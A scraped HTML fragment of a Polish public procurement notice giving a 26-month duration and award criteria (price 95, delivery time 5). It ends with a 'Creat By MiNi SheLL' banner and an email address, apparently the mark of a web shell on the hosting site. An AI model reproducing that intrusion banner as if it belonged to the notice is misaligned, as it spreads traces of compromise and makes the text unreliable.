<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 26.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawt - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com